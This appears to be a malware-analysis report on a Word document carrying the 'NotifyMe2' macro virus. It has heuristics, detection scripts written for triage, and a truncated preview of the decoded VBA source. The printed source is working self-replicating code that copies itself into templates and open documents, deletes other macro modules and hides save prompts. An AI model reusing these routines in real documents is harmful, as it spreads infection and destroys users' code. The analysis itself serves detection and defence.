Verdict: MALICIOUS
Risk score: 320
Malware insights
MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment)
The file is a malicious Word document carrying VBA macros with auto-exec entry points. The extracted module identifies itself as the 'NotifyMe WordMacro Virus Project' (module NotifyMe2, dated February 2000), and the visible code is a classic self-replicating Word macro virus: N2_CopyTo uses Application.OrganizerCopy to copy the NotifyMe2 module into Normal.dot and every loaded template (N2_D2T) and from there into every open document (N2_T2D); N2_Del wipes the other standard modules out of each target project; N2_StampIt rewrites the document summary properties (Author, Title, Subject, Comments); N2_ECopy seeds Normal.dot from a file named NotifyMe2.n2s in the Word startup folder; and Application.DisplayAlerts = wdAlertsNone suppresses the save prompts that would otherwise expose the activity. The AutoOpen and Auto_Close macros are the trigger, and the legacy WordBasic markers fit the era of the code. The ClamAV signature Doc.Trojan.Notme-1 corroborates the verdict. One caveat on the 'obfuscated auto-exec loader' heuristic: the only string reconstruction visible in the preview is a Chr() chain in N2_StampIt that builds the Comments field and decodes to plain text rather than a URL, ProgID or command, and the artifact-level assessment rates obfuscation or payload as unlikely, so confirm the loader label against the truncated remainder of the script before relying on it. Useful indicators from the listing: the module name NotifyMe2, the VBProject name/description 'NotifyMe' / 'NotifyMe 2 WordMacro Virus Project', the author stamp 'Tohenk', and the NotifyMe2.n2s file in the startup path.
Heuristics (6)

- ClamAV: Doc.Trojan.Notme-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware (Doc.Trojan.Notme-1).
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: the document contains VBA macro code.
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: an auto-exec macro reconstructs strings with a heavy custom decoder (numeric character array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro present.
- Auto_Close macro [high, OLE_VBA_AUTOCLOSE]: Auto_Close macro present.
- Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]: the OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/FileMacro/GlobMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
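The heuristics above (auto-exec entry points, Chr()-chain string reconstruction, replication or execution sinks) can be reproduced on extracted VBA source with a few regexes. The following is an added example written for this page, not code from the report or from the sample; it runs over a constructed input that quotes the N2_Copy and N2_StampIt routines from the preview below and adds hypothetical stand-in bodies for AutoOpen and Auto_Close, whose real bodies fall outside the preview. It decodes the Chr() chain, then applies the same distinction the report draws: a decoded string that is plain prose does not by itself make the macro a loader, while OrganizerCopy/VBProject use with an auto-exec trigger is the self-replication pattern of a macro virus.

```python
import re

# Constructed sample input. N2_Copy/N2_StampIt are quoted from the macros.bas
# preview; the AutoOpen/Auto_Close bodies are hypothetical stand-ins, since the
# report lists those macros but does not show their code.
SAMPLE_VBA = r'''Private Sub N2_Copy(Src, Dest, Name)
For Each Item In Name
Application.OrganizerCopy Src, Dest.FullName, Item, wdOrganizerObjectProjectItems
Next Item
End Sub
Private Sub N2_StampIt()
With Dialogs(wdDialogFileSummaryInfo)
.Comments = _
"This was created and dedicated for: MY LITTLE SWEAT-GIRL " & _
Chr(34) & Chr(78) & Chr(85) & Chr(78) & Chr(85) & Chr(75) & _
Chr(34) & Chr(44) & Chr(32) & Chr(84) & Chr(65) & Chr(67) & _
Chr(73) & Chr(75) & Chr(44) & Chr(32) & Chr(85) & Chr(76) & _
Chr(70) & Chr(65) & Chr(44) & Chr(32) & Chr(78) & Chr(71) & _
Chr(65) & Chr(78) & Chr(84) & Chr(72) & Chr(82) & Chr(85) & Chr(69) & ", aND SO on"
.Execute
End With
End Sub
Sub AutoOpen()
Call N2_ECopy   ' hypothetical stand-in body
End Sub
Sub Auto_Close()
Call N2_Master  ' hypothetical stand-in body
End Sub
'''

AUTOEXEC = ("AutoOpen", "AutoClose", "Auto_Open", "Auto_Close", "AutoExec",
            "AutoNew", "AutoExit", "Document_Open", "Document_Close")
# OrganizerCopy/VBProject/NormalTemplate are the Word-97-era self-replication
# API; the rest are the sinks a modern loader feeds decoded strings into.
# "Execute" also matches Dialogs(...).Execute, which here only writes properties.
SINKS = ("OrganizerCopy", "VBProject", "NormalTemplate", "CreateObject",
         "Shell", "WScript", "URLDownloadToFile", "Execute")


def join_continuations(src):
    """Fold VBA ' _' line continuations so a split expression becomes one line."""
    return re.sub(r"\s_\r?\n\s*", " ", src)


def find_autoexec(src):
    """Names of auto-exec procedures defined in the source, in order of appearance."""
    pat = re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(%s)\b" % "|".join(AUTOEXEC),
                     re.IGNORECASE | re.MULTILINE)
    return [m.group(1) for m in pat.finditer(src)]


def decode_chr_chains(src, min_len=4):
    """Rebuild every run of Chr(n) & Chr(n) & ... into the string it produces."""
    src = join_continuations(src)
    run = re.compile(r"ChrW?\(\s*\d+\s*\)(?:\s*&\s*ChrW?\(\s*\d+\s*\))+", re.IGNORECASE)
    out = []
    for m in run.finditer(src):
        codes = [int(c) for c in re.findall(r"\d+", m.group(0))]
        if len(codes) >= min_len:
            out.append("".join(chr(c) for c in codes))
    return out


def find_sinks(src):
    """Count references to each replication/execution sink (case-insensitive)."""
    counts = {}
    for s in SINKS:
        n = len(re.findall(r"\b%s\b" % re.escape(s), src, re.IGNORECASE))
        if n:
            counts[s] = n
    return counts


def looks_like_payload(s):
    """Decoded text naming a URL, path, ProgID or binary is a loader indicator."""
    return bool(re.search(r"https?://|\\\\|[A-Za-z]:\\|\.(exe|dll|vbs|ps1|bat)\b|"
                          r"WScript|Shell\.Application|MSXML|XMLHTTP|ADODB",
                          s, re.IGNORECASE))


def triage(src):
    """Combine the three signals the report's heuristics rely on into one verdict."""
    autoexec = find_autoexec(src)
    decoded = decode_chr_chains(src)
    sinks = find_sinks(src)
    payload = [d for d in decoded if looks_like_payload(d)]
    replicates = any(k in sinks for k in ("OrganizerCopy", "VBProject", "NormalTemplate"))
    if autoexec and (payload or replicates):
        verdict = "malicious"
    elif autoexec and (decoded or sinks):
        verdict = "suspicious"
    else:
        verdict = "benign-looking"
    return {"autoexec": autoexec, "decoded": decoded, "payload_strings": payload,
            "sinks": sinks, "self_replicating": replicates, "verdict": verdict}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

On this input the Chr() chain decodes to the dedication text `"NUNUK", TACIK, ULFA, NGANTHRUE`, which `looks_like_payload` rejects, so the "malicious" verdict comes from the AutoOpen trigger plus OrganizerCopy, not from the decoded string. That is the practical reading of the report: the obfuscation heuristic fired on a string that turns out to be harmless, while the replication API is what matters.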
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10553 bytes | a51b0b72cb22c4ce760333a924525d54d70caf607158eec8491408da2bcc3249 | ClamAV: Doc.Trojan.Notme-1 | unlikely |
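The artifact above is olevba's decoded VBA project. The legacy WordBasic heuristic warns that Word 6/95 macro forms live outside that project, so a practitioner who wants to confirm the marker hit scans the raw OLE streams instead. The following is an added example written for this page, not code from the report or from oletools; the marker list is the one the heuristic names, the combination rule (an auto-exec marker plus a macro-management marker) is the first half of the heuristic's description (the named historical virus strings are not included), and `scan_ole_file` assumes the third-party `olefile` package is installed. The input exercised offline is a constructed byte string, not a stream from the sample.

```python
import re

MARKERS = ("AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit",
           "ToolsMacro", "MacroFile", "FileMacro", "GlobMacro")
MANAGEMENT = ("ToolsMacro", "MacroFile", "FileMacro", "GlobMacro")

# Constructed stream: an ASCII "MacroFile" and a UTF-16LE "AutoOpen" buried in
# filler bytes, standing in for a Word 6/95 macro table that olevba would not decode.
CONSTRUCTED_STREAM = (b"\x00" * 16 + b"MacroFile" + b"\x00" * 8
                      + "AutoOpen".encode("utf-16-le") + b"\xff" * 12)


def marker_patterns():
    """Each marker compiled twice: ASCII and UTF-16LE, case-insensitive on the letters."""
    pats = []
    for m in MARKERS:
        pats.append((m, "ascii", re.compile(re.escape(m.encode("ascii")), re.IGNORECASE)))
        pats.append((m, "utf-16le", re.compile(re.escape(m.encode("utf-16-le")), re.IGNORECASE)))
    return pats


def scan_bytes(blob):
    """Return {marker: [(encoding, offset), ...]} for every hit in the raw bytes."""
    hits = {}
    for name, enc, pat in marker_patterns():
        for m in pat.finditer(blob):
            hits.setdefault(name, []).append((enc, m.start()))
    return hits


def legacy_macro_virus_indicators(hits):
    """Apply the heuristic's combination rule to a hit map.

    Returns (flag, auto_markers, management_markers); flag is True only when an
    auto-exec marker and a macro-management marker are both present.
    """
    auto = sorted(n for n in hits if n.startswith("Auto"))
    mgmt = sorted(n for n in hits if n in MANAGEMENT)
    return bool(auto and mgmt), auto, mgmt


def scan_ole_file(path):
    """Walk every stream of a real OLE document; needs the olefile package (assumed)."""
    import olefile  # third-party dependency, not exercised in the offline run
    results = {}
    with olefile.OleFileIO(path) as ole:
        for entry in ole.listdir(streams=True, storages=False):
            hits = scan_bytes(ole.openstream(entry).read())
            if hits:
                results["/".join(entry)] = hits
    return results


if __name__ == "__main__":
    hits = scan_bytes(CONSTRUCTED_STREAM)
    print(hits)
    print(legacy_macro_virus_indicators(hits))
```

The scan is deliberately encoding-agnostic because Word stores names both as ANSI and as UTF-16LE depending on the record; a marker found only in the WordDocument or Macros storage and absent from the VBA project is exactly the case the heuristic describes, and it is worth dumping those streams by hand before concluding the macro set is fully enumerated.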
Script preview: first 1,000 lines of the extracted macros.bas
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NotifyMe2"
'***************************************************************
' NotifyMe WordMacro Virus Project
' Version 2.10.02
' Created by Tohenk (c) Tohenk Software, 2000
' Date 02 February 2000
' Revised 15, 16, 24, 29 February 2000
' Activated 29 February 2000
' Dedicated to -All My Generation in this occupation
' -We all have the same destiny
' -Also specially to my family and my lover
'***************************************************************
' Global variables
Public N2_TIMED As Boolean
Public N2_CONF As Boolean
Public N2_GCONF As Boolean
Public N2_TCOUNT As Integer
' Internal variables
Private N2_ASAV
Private N2_DOCSAV As Boolean
Private Const N2_ID = "NotifyMe2"
Private Const N2_FSRC = ".n2s"
Private Const N2_FTEMP = ".dot"
' Private procedure for internal handling
Private Function N2_Infected(Src) As Boolean
N2_Infected = False
For Each Item In Src.VBProject.VBComponents
If Item.Name = N2_ID Then
If Item.CodeModule.CountOfLines <> 0 Then
N2_Infected = True
Else
Application.OrganizerDelete Src.FullName, Item.Name, wdOrganizerObjectProjectItems
End If
End If
Next Item
End Function
Private Sub N2_Copy(Src, Dest, Name)
For Each Item In Name
Application.OrganizerCopy Src, Dest.FullName, Item, wdOrganizerObjectProjectItems
Next Item
If Dest <> NormalTemplate Then
With Dest.VBProject
.Name = "NotifyMe"
.Description = "NotifyMe 2 WordMacro Virus Project"
End With
End If
End Sub
Private Sub N2_Del(Src)
For Each Item In Src.VBProject.VBComponents
If Item.Name <> N2_ID And _
Item.Name <> "ThisDocument" And _
Item.Name <> "Reference to Normal" Then
If Item.Type = vbext_ct_StdModule Then Item.CodeModule.DeleteLines 1, Item.CodeModule.CountOfLines
End If
Next Item
End Sub
Private Sub N2_CopyTo(Src, Dest)
On Error Resume Next
Dim MacroList(0)
MacroList(0) = N2_ID
N2_DOCSAV = False
Call N2_Del(Dest)
If Not N2_Infected(Dest) Then
Call N2_Copy(Src, Dest, MacroList)
N2_DOCSAV = True
End If
End Sub
Private Sub N2_StampIt()
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Tohenk"
.Title = "NotifyMe 2 WordMacro Virus"
.Subject = "Just NOTIFY-ME to what I've done"
.Comments = _
"This was created and dedicated for: MY LITTLE SWEAT-GIRL " & _
Chr(34) & Chr(78) & Chr(85) & Chr(78) & Chr(85) & Chr(75) & _
Chr(34) & Chr(44) & Chr(32) & Chr(84) & Chr(65) & Chr(67) & _
Chr(73) & Chr(75) & Chr(44) & Chr(32) & Chr(85) & Chr(76) & _
Chr(70) & Chr(65) & Chr(44) & Chr(32) & Chr(78) & Chr(71) & _
Chr(65) & Chr(78) & Chr(84) & Chr(72) & Chr(82) & Chr(85) & Chr(69) & ", aND SO on"
.Execute
End With
End Sub
Private Sub N2_D2T()
N2_ASAV = Application.DisplayAlerts
Application.DisplayAlerts = wdAlertsNone
For Each Temp In Templates
Call N2_CopyTo(ActiveDocument.FullName, Temp)
If N2_DOCSAV Then Temp.Save
Next Temp
Application.DisplayAlerts = N2_ASAV
End Sub
Private Sub N2_T2D()
N2_ASAV = Application.DisplayAlerts
Application.DisplayAlerts = wdAlertsNone
For Each Doc In Documents
Call N2_CopyTo(NormalTemplate.FullName, Doc)
Call N2_StampIt
Next Doc
Application.DisplayAlerts = N2_ASAV
End Sub
Private Sub N2_Master()
Call N2_D2T
Call N2_T2D
End Sub
Private Sub N2_ECopy()
On Error Resume Next
Src = Options.DefaultFilePath(wdStartupPath) & "\" & N2_ID & N2_FSRC
Call N2_CopyTo(Src, NormalTemplate)
Call N2_Master
ActiveDocument.Saved = True
End Sub
Private Sub N2_RSF()
SLoc = Options.DefaultFilePath(wdStartupPath)
Sfile = Dir(SLoc & "\*" & N2_FTEMP)
Do While Sfile <> ""
... (truncated)